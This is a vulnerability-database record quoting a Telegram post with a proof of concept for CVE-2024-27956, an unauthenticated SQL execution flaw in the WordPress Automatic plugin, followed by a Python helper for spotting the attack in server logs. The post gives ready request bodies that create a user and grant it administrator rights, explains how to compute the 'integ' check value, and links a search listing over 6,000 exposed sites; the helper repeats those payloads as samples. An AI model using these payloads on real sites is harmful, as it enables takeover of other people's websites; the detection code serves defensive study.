{"uuid": "2aa4e3e0-bfb2-490f-aa1d-b6099fd5a407", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/paiddpam/2939", "content": "\ud83d\udc69\u200d\ud83d\udcbb PoC for WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) (CVSS 9.9)\n\nSince \"q\" is passed directly into a $wpdb->get_results() call, you can execute SQL commands directly.\n\nAdding a new WordPress user:\nq=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', 'poc@localhost.org', NOW(), 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28\nGiving the user admin rights:\nq=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (6, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}'), (6, 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c\nPWNED!\n\nNote: the \"integ\" param is the md5sum of the query.\n\n6K+ services found: https://hunter.how/list?searchValue=web.body%3D%22wp-content%2Fplugins%2Fwp-automatic%22\n\nTweet: https://x.com/mrtuxracer/status/1784229071460692232?s=12", "creation_timestamp": "2024-06-13T06:56:04.000000Z"}
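Added example, not part of the Telegram post above and not code from the WP Automatic plugin: a small Python triage helper for anyone checking web-server logs or WAF captures for the request shape the post describes. It parses a `q=...&auth=...&integ=...` form body, recomputes `integ` as the MD5 of the `q` value as the post's note says, and flags bodies where a valid `integ` is paired with a data-modifying statement. The parameter names `q`, `auth` and `integ` come from the post; the sample bodies are constructed from the post's two parameter strings plus one control; the assumption that the hash covers the URL-decoded `q` string exactly as the server receives it is mine (the post only says "md5sum of the query").

```python
import hashlib
from urllib.parse import unquote_plus

# Constructed sample request bodies in the q=...&auth=...&integ=... shape the
# post shows. The first two are the post's own parameter strings; the third is
# a control with a deliberately wrong integ value.
SAMPLE_BODIES = [
    "q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, "
    "user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', "
    "'poc@localhost.org', NOW(), 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28",
    "q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES "
    "(6, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}'), "
    "(6, 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c",
    "q=SELECT 1&auth=%20&integ=00000000000000000000000000000000",
]

WRITE_KEYWORDS = ("INSERT", "UPDATE", "DELETE", "DROP", "ALTER", "REPLACE", "CREATE")


def parse_form_body(body: str) -> dict:
    """Split an application/x-www-form-urlencoded body into a dict.

    Splitting is done on '&' only, never on ';', because the SQL in q
    legitimately contains semicolons (the statement terminator and the
    serialized PHP array) that must stay part of the value.
    """
    params = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def integ_for(query: str) -> str:
    """MD5 hex digest of the query text.

    Assumption (my own, not stated in the post beyond 'md5sum of the query'):
    the hash covers the URL-decoded q string exactly as the server receives it.
    """
    return hashlib.md5(query.encode("utf-8")).hexdigest()


def is_write_statement(query: str) -> bool:
    """True when the statement starts with a data- or schema-modifying verb."""
    if not query.strip():
        return False
    first_word = query.lstrip().split(None, 1)[0].upper()
    return first_word in WRITE_KEYWORDS


def analyze_request(body: str) -> dict:
    """Triage one captured body for the CVE-2024-27956 PoC pattern."""
    params = parse_form_body(body)
    query = params.get("q", "")
    integ = params.get("integ", "")
    integ_ok = bool(integ) and integ.lower() == integ_for(query)
    return {
        "query": query,
        "auth": params.get("auth", ""),
        "integ_matches_md5": integ_ok,
        "write_statement": is_write_statement(query),
        # The pattern of interest: an integ the plugin would accept, paired
        # with a statement that modifies data rather than reading it.
        "suspicious": integ_ok and is_write_statement(query),
    }


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        result = analyze_request(body)
        print(
            f"suspicious={result['suspicious']!s:5} "
            f"integ_ok={result['integ_matches_md5']!s:5} "
            f"write={result['write_statement']!s:5} "
            f"q={result['query'][:60]!r}"
        )
```

Feed it decoded request bodies one per line; a hit on `suspicious` means the body carries both a correctly computed `integ` and a write statement, which is the combination the post's PoC relies on. A body whose `integ` does not match under this assumption is not proof the request was harmless, only that it would not have passed the check as the post describes it.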